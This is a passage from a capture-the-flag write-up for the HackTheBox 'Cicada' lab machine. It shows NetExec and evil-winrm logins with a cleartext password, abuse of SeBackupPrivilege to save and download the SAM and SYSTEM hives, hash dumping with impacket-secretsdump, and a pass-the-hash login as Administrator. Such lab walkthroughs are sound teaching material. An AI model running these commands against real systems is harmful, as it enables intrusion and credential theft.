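    print(summarize(audit_share(SAMPLE_FILES)))
```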

We can finally check whether this user can log into the target machine through the WinRM service (port 5985, which we saw exposed), again with NetExec:

❯ nxc winrm 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

WINRM       10.10.11.35     5985   CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM       10.10.11.35     5985   CICADA-DC        [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)

We can see the message Pwn3d!, which for the winrm protocol means the credentials are correct and we can connect to the victim machine through WinRM.

We could even get the user flag using only NetExec, since we can execute PowerShell commands (WinRM gives us a PowerShell remoting session) with the -X "<command>" flag. We list the directories under C:\Users:

❯ nxc winrm 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -X 'dir C:\Users\'

WINRM       10.10.11.35     5985   CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM       10.10.11.35     5985   CICADA-DC        [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
WINRM       10.10.11.35     5985   CICADA-DC        [+] Executed command (shell type: powershell)
WINRM       10.10.11.35     5985   CICADA-DC
WINRM       10.10.11.35     5985   CICADA-DC
WINRM       10.10.11.35     5985   CICADA-DC        Directory: C:\Users
WINRM       10.10.11.35     5985   CICADA-DC
WINRM       10.10.11.35     5985   CICADA-DC
WINRM       10.10.11.35     5985   CICADA-DC        Mode                 LastWriteTime         Length Name
WINRM       10.10.11.35     5985   CICADA-DC        ----                 -------------         ------ ----
WINRM       10.10.11.35     5985   CICADA-DC        d-----         8/26/2024   1:10 PM                Administrator
WINRM       10.10.11.35     5985   CICADA-DC        d-----         8/22/2024   2:22 PM                emily.oscars.CICADA
WINRM       10.10.11.35     5985   CICADA-DC        d-r---         3/14/2024   3:45 AM                Public

and grab the user flag:

❯ nxc winrm 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -X 'type C:\Users\emily.oscars.CICADA\Desktop\user.txt'

WINRM       10.10.11.35     5985   CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM       10.10.11.35     5985   CICADA-DC        [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
WINRM       10.10.11.35     5985   CICADA-DC        [+] Executed command (shell type: powershell)
WINRM       10.10.11.35     5985   CICADA-DC        508<SNIP>

We could keep using only NetExec, but from this point on we use evil-winrm with emily.oscars's credentials to get an interactive console on the victim machine:

❯ evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

Evil-WinRM shell v3.6

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>

NT Authority/System - Administrator

Checking the privileges of this user we see:

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

We have SeBackupPrivilege enabled. This privilege lets a process read any file for backup purposes regardless of its ACL, so we can save copies of the SAM and SYSTEM registry hives (SAM stores the local account password hashes; SYSTEM holds the boot key needed to decrypt them) and dump the hashes they contain on our attacker machine, as this blog explains.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save HKLM\SAM sam
The operation completed successfully.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save HKLM\SYSTEM system
The operation completed successfully.

Now that the copies exist, we transfer them to our attacker machine using evil-winrm's download command:

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download sam

Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam to sam

Info: Download successful!

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download system

Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system to system

Info: Download successful!

We then dump the credentials stored in these hives with secretsdump.py from Impacket, passing the downloaded files as arguments:

❯ impacket-secretsdump -sam sam -system system LOCAL

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

We get the NT hash for the Administrator user.

We check whether this hash is valid for the domain Administrator account using NetExec and the -H flag:

❯ nxc smb 10.10.11.35 -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'

SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!)

It works! For the smb protocol, the Pwn3d! message in NetExec means the account has administrative privileges over the system.

We use this hash in a Pass The Hash attack as the Administrator user with evil-winrm:

❯ evil-winrm -i 10.10.11.35 -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami

cicada\administrator

GG. We can grab the root.txt flag from the Administrator Desktop.

~Happy Hacking